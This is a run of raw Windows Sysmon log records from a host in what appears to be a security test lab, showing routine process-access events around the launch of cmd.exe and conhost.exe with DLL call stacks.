12:10:04.656{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.625{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.625{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.609{266CAFBE-669C-6064-7C01-00000000AE01}43205536C:\Windows\system32\conhost.exe{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.609{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.609{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.594{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43566332C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+d6d17|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+167aaf 154100x800000000000000011299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.607{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" 
